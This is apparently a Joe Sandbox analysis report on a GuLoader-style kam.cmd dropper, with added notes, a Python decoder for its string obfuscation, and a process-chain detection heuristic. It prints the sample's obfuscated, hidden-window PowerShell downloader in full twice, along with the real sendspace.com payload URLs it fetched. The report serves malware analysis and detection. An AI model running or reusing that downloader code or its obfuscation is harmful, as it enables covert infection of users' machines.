        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$kiaki = 1;$vaabenmnd='sub';$vaabenmnd+='strin';$vaabenmnd+='g';function hystadens($rivalled){$kortende=$rivalled.length-$kiaki;for($ransagningskendelsens=5;$ransagningskendelsens -lt $kortende;$ransagningskendelsens+=6){$indervrelses+=$rivalled.$vaabenmnd.invoke( $ransagningskendelsens, $kiaki);}$indervrelses;}function billedhuggeren($dmpningsfaktorernes){&($searchlights) ($dmpningsfaktorernes);}$maimon=hystadens 'skurvmsekuno ko,tzplotti carbl lineladkvaakommu/super5ov,rl. stje0un ud karma( .ropwwagwiipyruvnsyfildtelefomultiwbrk.osunpau artin fibut orma f,rly1sj.eg0d,spe. heda0 loya;a,fot gramwu.kamistudin poli6skatt4hoard;bagst svi.ex klem6 sale4ambis; ,res .onocrfedervfasci:an,at1nords2.tent1doven.oopho0frkap)co cl returgtampoesn,escsundhk krifocentr/kigho2 .ooc0radio1mo.kr0merce0cents1engol0 nthr1leuco sn.sfkundsimy,omr micreveterfoptimolyst xr,pag/ ,xam1knipl2 sloo1thwar. rore0 trus ';$cleanlier245=hystadens ' overu sam,sstangefi.dyrsta n-c,ookahamarg nstaesnavenprecotisoan ';$outgnaw=hystadens ' .redhhaematsnappt svkkp diplsye.rn:recip/.edtp/aa dvws rafwsp,rtw ta.r. 
h,lbsantileejendnugunsdh ssessockhpduo eaiac.hcse,siecockm.dand,cte.rio mostmpaleo/s ubopunvolra.totobeton/gstg d r.sll .nsa/intero eriegsemicmshivo6fjernqslagtcphilt ';$kragerede=hystadens 'proph>knuck ';$searchlights=hystadens ' genni afteetr,nsxoutto ';$eradicated='tj';$unvision = hystadens 'finaneupayacfrotth nonvos.bma balsa%mise acamoupund,spfor,jdo.ercaoverbtdaab,airous% ,eds\cam ut telecrecr,h non,i laskcresi.ksanit.el phitena.ttrkvoexylog pla i& benm&foreg tur.uetillbcungulhcliteohabuk th nkt epis ';billedhuggeren (hystadens ' trde$annamgvin alvoldto sul,b .orka .elilsting:graphbspasmoudbl r acrad.uldsi,eerbnspatlgs.sed= su a(buffwcfro bmxylogdsagvo primr/dobbeceksdi drugg$dekleulmarkn jun.vmuslii ventsbekl.irut forigkengeoem)no di ');billedhuggeren (hystadens 'manip$ paitghyperl.nedkopetrobp,epra ydroli.ter:d lesjtenora.ransr asienmang.ong,el=a,sin$terraoreuneulabyrt e engnonveng isoabullfwt ngh.engels.emoupgaperltelefizolaet anlg( pla.$unf okpr,rerdisora.fterglys iebism,rslambehipbodchople .ass) incu ');$outgnaw=$jarno[0];$cardiospermum= (hystadens '.isas$unanigprobalkart os,inebmi,rea,lerflretic:rullesreinseopslucst rereudioelleuft portsarbit=yahunn epitegala wlamfl-forglo tilkbcl doj flogeargotcu.yret kvle modarsprivayfyldesreckotnyctaeinformsamme. unmunkomm,erelattprein.op.trwbombee va.sbfjerncnoncolcabulitroldeuncomnhomoet');$cardiospermum+=$bording[1];billedhuggeren ($cardiospermum);billedhuggeren (hystadens 'outga$stenosturfiekod.scp,ixnr ontrer.tacthyd.oscauli. p.cnhharcee smaga,olysdfloveedomparanalespeize[m rge$.ndekclgteslfrem,eindtracloddnlo qulporcuino voealacrrnonte2 tols4 ante5redni] syld=campe$meccam fraga,ilgailargemyo.kloj.rdfnmel,e ');$jumped=hystadens 'genn,$octacstraade unsuc tarbrfirmaephysitnyskasboo.t.afvrgdhankaojust,wartisn calylcremaoa.kyladryer
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$kiaki = 1;$vaabenmnd='sub';$vaabenmnd+='strin';$vaabenmnd+='g';function hystadens($rivalled){$kortende=$rivalled.length-$kiaki;for($ransagningskendelsens=5;$ransagningskendelsens -lt $kortende;$ransagningskendelsens+=6){$indervrelses+=$rivalled.$vaabenmnd.invoke( $ransagningskendelsens, $kiaki);}$indervrelses;}function billedhuggeren($dmpningsfaktorernes){&($searchlights) ($dmpningsfaktorernes);}$maimon=hystadens 'skurvmsekuno ko,tzplotti carbl lineladkvaakommu/super5ov,rl. stje0un ud karma( .ropwwagwiipyruvnsyfildtelefomultiwbrk.osunpau artin fibut orma f,rly1sj.eg0d,spe. heda0 loya;a,fot gramwu.kamistudin poli6skatt4hoard;bagst svi.ex klem6 sale4ambis; ,res .onocrfedervfasci:an,at1nords2.tent1doven.oopho0frkap)co cl returgtampoesn,escsundhk krifocentr/kigho2 .ooc0radio1mo.kr0merce0cents1engol0 nthr1leuco sn.sfkundsimy,omr micreveterfoptimolyst xr,pag/ ,xam1knipl2 sloo1thwar. rore0 trus ';$cleanlier245=hystadens ' overu sam,sstangefi.dyrsta n-c,ookahamarg nstaesnavenprecotisoan ';$outgnaw=hystadens ' .redhhaematsnappt svkkp diplsye.rn:recip/.edtp/aa dvws rafwsp,rtw ta.r. 
h,lbsantileejendnugunsdh ssessockhpduo eaiac.hcse,siecockm.dand,cte.rio mostmpaleo/s ubopunvolra.totobeton/gstg d r.sll .nsa/intero eriegsemicmshivo6fjernqslagtcphilt ';$kragerede=hystadens 'proph>knuck ';$searchlights=hystadens ' genni afteetr,nsxoutto ';$eradicated='tj';$unvision = hystadens 'finaneupayacfrotth nonvos.bma balsa%mise acamoupund,spfor,jdo.ercaoverbtdaab,airous% ,eds\cam ut telecrecr,h non,i laskcresi.ksanit.el phitena.ttrkvoexylog pla i& benm&foreg tur.uetillbcungulhcliteohabuk th nkt epis ';billedhuggeren (hystadens ' trde$annamgvin alvoldto sul,b .orka .elilsting:graphbspasmoudbl r acrad.uldsi,eerbnspatlgs.sed= su a(buffwcfro bmxylogdsagvo primr/dobbeceksdi drugg$dekleulmarkn jun.vmuslii ventsbekl.irut forigkengeoem)no di ');billedhuggeren (hystadens 'manip$ paitghyperl.nedkopetrobp,epra ydroli.ter:d lesjtenora.ransr asienmang.ong,el=a,sin$terraoreuneulabyrt e engnonveng isoabullfwt ngh.engels.emoupgaperltelefizolaet anlg( pla.$unf okpr,rerdisora.fterglys iebism,rslambehipbodchople .ass) incu ');$outgnaw=$jarno[0];$cardiospermum= (hystadens '.isas$unanigprobalkart os,inebmi,rea,lerflretic:rullesreinseopslucst rereudioelleuft portsarbit=yahunn epitegala wlamfl-forglo tilkbcl doj flogeargotcu.yret kvle modarsprivayfyldesreckotnyctaeinformsamme. unmunkomm,erelattprein.op.trwbombee va.sbfjerncnoncolcabulitroldeuncomnhomoet');$cardiospermum+=$bording[1];billedhuggeren ($cardiospermum);billedhuggeren (hystadens 'outga$stenosturfiekod.scp,ixnr ontrer.tacthyd.oscauli. p.cnhharcee smaga,olysdfloveedomparanalespeize[m rge$.ndekclgteslfrem,eindtracloddnlo qulporcuino voealacrrnonte2 tols4 ante5redni] syld=campe$meccam fraga,ilgailargemyo.kloj.rdfnmel,e ');$jumped=hystadens 'genn,$octacstraade unsuc tarbrfirmaephysitnyskasboo.t.afvrgdhankaojust,wartisn calylcremaoa.kyladryerJump to behavior
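The command line above decodes mechanically: `$Vaabenmnd` is assembled into the method name `Substring`, and `Hystadens` walks the literal from offset 5 in steps of 6, taking one character each time and never the last one, so the plaintext is every sixth character and everything else is filler. The following is an added Python reimplementation of that decoder (it is not code from the report or from the sample); the obfuscated literals are copied from the command line above, and `fake_cmd_output` is this example's stand-in for the `cmd /c` call the stage makes (with an assumed `%appdata%` of `C:\Users\user\AppData\Roaming`). It also shows why a purely static decode of `$Cardiospermum` is one letter short: the stage appends the second line of that `cmd` output, i.e. the `t` printed by `echo t`. The User-Agent literal assigned to `$Maimon` is deliberately left out, because runs of spaces inside its filler were collapsed when the report was rendered and it no longer decodes correctly from the page as shown.

```python
# Added example (not part of the Joe Sandbox report or the sample): decoder for
# the "Hystadens" string obfuscation used by the kam.cmd PowerShell stage.
#
# Hystadens($s) in the stage: for i = 5; i < len(s) - $Kiaki; i += 6 take
# $s.Substring(i, $Kiaki), with $Kiaki = 1. Plaintext = every sixth character
# from offset 5; the final character of the literal is never taken.

def hystadens(s: str, start: int = 5, step: int = 6, keep: int = 1) -> str:
    """Reimplementation of the stage's Hystadens loop.

    keep mirrors $Kiaki (the Substring length); the loop bound Length - $Kiaki
    excludes the trailing character. Equivalent to s[5:len(s) - 1:6].
    """
    out = []
    i = start
    while i < len(s) - keep:
        out.append(s[i:i + keep])
        i += step
    return "".join(out)

# Obfuscated literals copied verbatim from the powershell.exe command line.
CLEANLIER245 = ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan '
KRAGEREDE = 'Proph>Knuck '
SEARCHLIGHTS = ' genni AfteeTr,nsxOutto '
UNVISION = r'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis '
CARDIOSPERMUM = '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet'


def fake_cmd_output(cmd_line: str, appdata: str = r'C:\Users\user\AppData\Roaming') -> list[str]:
    """Constructed stand-in for `cmd /c <line>` as the stage runs it via
    $Bording = (cmd /c $Unvision). It only understands the
    'echo X && echo Y' form this sample uses and expands %appdata% to an
    assumed profile path."""
    lines = []
    for part in (p.strip() for p in cmd_line.split('&&')):
        if not part.startswith('echo '):
            raise ValueError(f'unsupported command: {part!r}')
        lines.append(part[len('echo '):].replace('%appdata%', appdata))
    return lines


def reconstruct_webclient_line() -> str:
    """$Cardiospermum decodes to '...System.Net.WebClien'; the stage then does
    $Cardiospermum += $Bording[1], where $Bording[1] is the 't' that
    'echo t' printed. Static decoding alone misses that last letter."""
    bording = fake_cmd_output(hystadens(UNVISION))
    return hystadens(CARDIOSPERMUM) + bording[1]


def decode_all() -> dict[str, str]:
    """Every literal that survives the page's whitespace collapse, decoded."""
    return {
        'Cleanlier245': hystadens(CLEANLIER245),    # header name set on the WebClient
        'Kragerede': hystadens(KRAGEREDE),          # delimiter used to split the URL list
        'Searchlights': hystadens(SEARCHLIGHTS),    # the cmdlet Billedhuggeren invokes
        'Unvision': hystadens(UNVISION),            # cmd line whose output becomes $Bording
        'Cardiospermum': reconstruct_webclient_line(),
    }


if __name__ == '__main__':
    for name, value in decode_all().items():
        print(f'{name:14} -> {value}')
```

Running it prints `User-Agent`, `>`, `iex`, the `echo %appdata%\Tchick.Ite && echo t` line that the report shows as the child `cmd.exe`, and the completed `$global:Secrets=New-Object System.Net.WebClient`. The `iex` and `WebClient` results are what make `Billedhuggeren(...)` an `Invoke-Expression` of each decoded fragment and `$Secrets` the downloader; the remaining fragment on the page (`$Jumped`) is cut off by the report and is not decoded here.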
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation (4 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
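The process chain recorded above (cmd.exe starting powershell.exe with `-windowstyle hidden` and a multi-kilobyte command line, which starts a cmd.exe that echoes `%appdata%`, which starts powershell.exe again) is detectable from process-creation telemetry alone. The following is an added example, not code from the report, of a heuristic written against constructed Sysmon Event ID 1-style records (field names `Image`, `ParentImage`, `CommandLine` are Sysmon's; the records, the process IDs, the 1000-character threshold and the alert threshold are this example's own choices). The PowerShell record uses the real opening of the sample's command line, padded with filler to stand in for the rest of it.

```python
# Added example (not part of the Joe Sandbox report): process-creation
# heuristic for the cmd.exe -> powershell.exe -windowstyle hidden -> cmd.exe
# chain this sample produces. Records below are constructed for the example.
import re

LONG_CMDLINE = 1000  # characters; assumed threshold, the sample's line is several kB

HIDDEN_WINDOW = re.compile(r'(?i)-w(?:indowstyle)?\s+hidden')
# $obj.$name.Invoke(...): a method name assembled at runtime, as in
# $Rivalled.$Vaabenmnd.Invoke(...) where $Vaabenmnd is 'Sub'+'strin'+'g'
RUNTIME_METHOD = re.compile(r'(?i)\$\w+\s*\.\s*\$\w+\s*\.\s*Invoke\s*\(')
# &($var) (...): the call operator applied to a variable (here it holds 'iex')
CALL_OP_ON_VAR = re.compile(r'&\s*\(\s*\$\w+\s*\)')
ECHO_APPDATA = re.compile(r'(?i)\becho\s+%appdata%')


def basename(path: str) -> str:
    return path.rsplit('\\', 1)[-1].lower()


def score_event(ev: dict) -> list[str]:
    """Return the indicators one process-creation record triggers."""
    reasons = []
    image, parent = basename(ev.get('Image', '')), basename(ev.get('ParentImage', ''))
    cmd = ev.get('CommandLine', '')
    if image == 'powershell.exe':
        if parent == 'cmd.exe':
            reasons.append('powershell.exe started by cmd.exe')
        if HIDDEN_WINDOW.search(cmd):
            reasons.append('hidden window requested')
        if len(cmd) > LONG_CMDLINE:
            reasons.append(f'command line longer than {LONG_CMDLINE} characters')
        if RUNTIME_METHOD.search(cmd):
            reasons.append('method name built at runtime and called via .Invoke(')
        if CALL_OP_ON_VAR.search(cmd):
            reasons.append('call operator applied to a variable (&($x))')
    elif image == 'cmd.exe' and parent == 'powershell.exe' and ECHO_APPDATA.search(cmd):
        reasons.append('cmd.exe child of powershell.exe echoing %appdata%')
    return reasons


def alert(events: list[dict], threshold: int = 3) -> list[tuple[int, list[str]]]:
    """(ProcessId, reasons) for each record that reaches the threshold."""
    return [(ev['ProcessId'], r) for ev in events if len(r := score_event(ev)) >= threshold]


# Constructed telemetry. STAGE_PREFIX is the real start of the sample's
# PowerShell command line; the 'A' padding stands in for the rest of it.
STAGE_PREFIX = ("$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';"
                "Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;"
                "For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;"
                "$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke("
                " $Ransagningskendelsens, $Kiaki);}$Indervrelses;}"
                "function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}")
SAMPLE_EVENTS = [
    {'ProcessId': 5084, 'ParentImage': r'C:\Windows\explorer.exe',
     'Image': r'C:\Windows\System32\cmd.exe',
     'CommandLine': r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "'},
    {'ProcessId': 5256, 'ParentImage': r'C:\Windows\System32\cmd.exe',
     'Image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'CommandLine': 'powershell.exe -windowstyle hidden "' + STAGE_PREFIX + "'" + 'A' * 1200 + "'\""},
    {'ProcessId': 6100, 'ParentImage': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'Image': r'C:\Windows\System32\cmd.exe',
     'CommandLine': r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"'},
    {'ProcessId': 7000, 'ParentImage': r'C:\Windows\explorer.exe',  # benign admin use, for contrast
     'Image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'CommandLine': r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1'},
]

if __name__ == '__main__':
    for pid, reasons in alert(SAMPLE_EVENTS):
        print(pid, reasons)
```

Only the hidden, cmd.exe-spawned PowerShell record reaches the threshold; the `echo %appdata%` child scores one indicator on its own and is worth correlating by parent PID rather than alerting on alone, since `cmd /c echo` from PowerShell is also common in legitimate scripts.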
MITRE ATT&CK matrix (Joe Sandbox mapping). The number shown in front of a technique is the report's count badge for that technique; techniques without a number are the matrix's fixed placeholder cells and were not observed for this sample.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 11 Command and Scripting Interpreter; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 11 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
kam.cmd | 3% | ReversingLabs | |
No Antivirus matches (dropped files)
No Antivirus matches (unpacked PE files)
No Antivirus matches (domains)
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://fs12n5.sendspace.com | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/ogm6qc | 0% | Avira URL Cloud | safe |
https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso | 0% | Avira URL Cloud | safe |
http://www.sendspace.com | 0% | Avira URL Cloud | safe |
http://fs12n5.sendspace.com | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
https://www.sendspace.com | 0% | Avira URL Cloud | safe |
https://www.sendspace.com/pro/dl/ogm6qcP | 0% | Avira URL Cloud | safe |
https://fs12n5.sendspaX | 0% | Avira URL Cloud | safe |

Reading note: only the sendspace.com entries belong to this sample (they are the URLs it actually contacted, listed below). The nuget.org, contoso.com, aka.ms/pscore68, pesterbdd.com, github.com/Pester, apache.org and schemas.xmlsoap.org entries are string constants embedded in PowerShell's own bundled modules and the .NET runtime that the scanner picked out of powershell.exe memory; the sample never contacts them, and the 100% "malware" score on pesterbdd.com/images/Pester.png is a reputation-feed artefact, not sample behaviour. Entries such as https://go.micro and https://fs12n5.sendspaX are truncated strings from memory, not distinct URLs.
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fs12n5.sendspace.com | 69.31.136.53 | true | false | | unknown
www.sendspace.com | 172.67.170.105 | true | false | | unknown
50.23.12.20.in-addr.arpa | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.sendspace.com/pro/dl/ogm6qc | false | Avira URL Cloud: safe | unknown
https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso | false | Avira URL Cloud: safe | unknown
Name | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs12n5.sendspace.com | powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000002.00000002.2120955065.00000289A4E95000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs12n5.sendspaX | powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.2120955065.00000289A5DDC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fs12n5.sendspace.com | powershell.exe, 00000002.00000002.2120955065.00000289A67E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/ogm6qcP | powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sendspace.com | powershell.exe, 00000002.00000002.2120955065.00000289A67A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000002.00000002.2120955065.00000289A62C2000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000002.00000002.2120955065.00000289A4E3B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.170.105 | www.sendspace.com | United States | 13335 | CLOUDFLARENETUS | false
69.31.136.53 | fs12n5.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446778
Start date and time: 2024-05-23 21:02:39 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: kam.cmd
Detection: MAL
Classification: mal84.troj.evad.winCMD@7/6@3/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 7
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .cmd
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5256 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: kam.cmd
Time | Type | Description
15:03:27 | API Interceptor | 46x Sleep call for process: powershell.exe modified
Context: other samples Joe Sandbox has seen with the same IPs, domains, ASNs and JA3 fingerprint. "malicious" is Joe Sandbox's verdict for that sample, followed by the threat names it assigned; the report's "Get hash" and "Browse" links are omitted.

IP 172.67.170.105
  xff.cmd: malicious (AsyncRAT, GuLoader)
  las.cmd: malicious (GuLoader, XWorm)
  windows.vbs: malicious (GuLoader, XWorm)
  file.vbs: malicious (GuLoader, XWorm)
  time.vbs: malicious (GuLoader)
  file300un.exe: malicious (Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar)

IP 69.31.136.53
  zap.cmd: malicious (GuLoader, XWorm)
  xff.cmd: malicious (AsyncRAT, GuLoader)
  las.cmd: malicious (GuLoader, XWorm)
  las.cmd: malicious (GuLoader)
  upload.vbs: malicious (GuLoader, XWorm)
  update.vbs: malicious (GuLoader, XWorm)
  time.vbs: malicious (GuLoader)
  file300un.exe: malicious (Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar)
  https://www.sendspace.com/pro/dl/hg4kq5: malicious (Unknown)
  QRONSFGYUOPMWE.vbs: malicious (Unknown)

Domain www.sendspace.com (IP the domain resolved to in that analysis)
  zap.cmd: malicious (GuLoader, XWorm); 104.21.28.80
  xff.cmd: malicious (AsyncRAT, GuLoader); 172.67.170.105
  las.cmd: malicious (GuLoader, XWorm); 172.67.170.105
  las.cmd: malicious (GuLoader); 104.21.28.80
  kam.cmd: malicious (GuLoader); 104.21.28.80
  upload.vbs: malicious (GuLoader, XWorm); 104.21.28.80
  update.vbs: malicious (GuLoader, XWorm); 104.21.28.80
  file.vbs: malicious (GuLoader); 104.21.28.80
  windows.vbs: malicious (AsyncRAT, GuLoader); 104.21.28.80
  windows.vbs: malicious (GuLoader, XWorm); 172.67.170.105

Domain fs12n5.sendspace.com
  zap.cmd: malicious (GuLoader, XWorm); 69.31.136.53
  las.cmd: malicious (GuLoader, XWorm); 69.31.136.53

ASN GTT-BACKBONEGTTDE (IP seen in that analysis)
  zap.cmd: malicious (GuLoader, XWorm); 69.31.136.53
  xff.cmd: malicious (AsyncRAT, GuLoader); 69.31.136.53
  las.cmd: malicious (GuLoader, XWorm); 69.31.136.53
  las.cmd: malicious (GuLoader); 69.31.136.53
  kam.cmd: malicious (GuLoader); 69.31.136.57
  upload.vbs: malicious (GuLoader, XWorm); 69.31.136.53
  update.vbs: malicious (GuLoader, XWorm); 69.31.136.53
  file.vbs: malicious (GuLoader); 69.31.136.17
  windows.vbs: malicious (AsyncRAT, GuLoader); 69.31.136.17
  windows.vbs: malicious (GuLoader, XWorm); 69.31.136.57

ASN CLOUDFLARENETUS (IP seen in that analysis)
  zap.cmd: malicious (GuLoader, XWorm); 104.21.28.80
  http://hxjmm.check-tl-ver-154-2.com: malicious (Unknown); 104.21.46.101
  xff.cmd: malicious (AsyncRAT, GuLoader); 172.67.170.105
  las.cmd: malicious (GuLoader, XWorm); 172.67.170.105
  https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recording: malicious (Unknown); 104.18.72.113
  https://t.co/PmbTTSQ6z4: malicious (Unknown); 162.247.243.29
  Offer 15492024 15602024.docx.doc: malicious (Unknown); 172.67.171.37
  Purchase Order # PO-00159.xla.xlsx: malicious (Unknown); 188.114.96.3
  LHER000698175.xls: malicious (Unknown); 188.114.96.3
  2300-02998.exe: malicious (FormBook); 172.67.138.9

JA3 fingerprint 3b5074b1b5d032e5620f69f9f700ff0e (every entry below was seen with both 172.67.170.105 and 69.31.136.53)
  zap.cmd: malicious (GuLoader, XWorm)
  xff.cmd: malicious (AsyncRAT, GuLoader)
  las.cmd: malicious (GuLoader, XWorm)
  S28BW-420120416270,pdf.exe: malicious (AgentTesla, DBatLoader, PureLog Stealer)
  Dextron Group PO.exe: malicious (AgentTesla, DBatLoader, PureLog Stealer)
  las.cmd: malicious (GuLoader)
  044f.pdf.exe: malicious (AgentTesla)
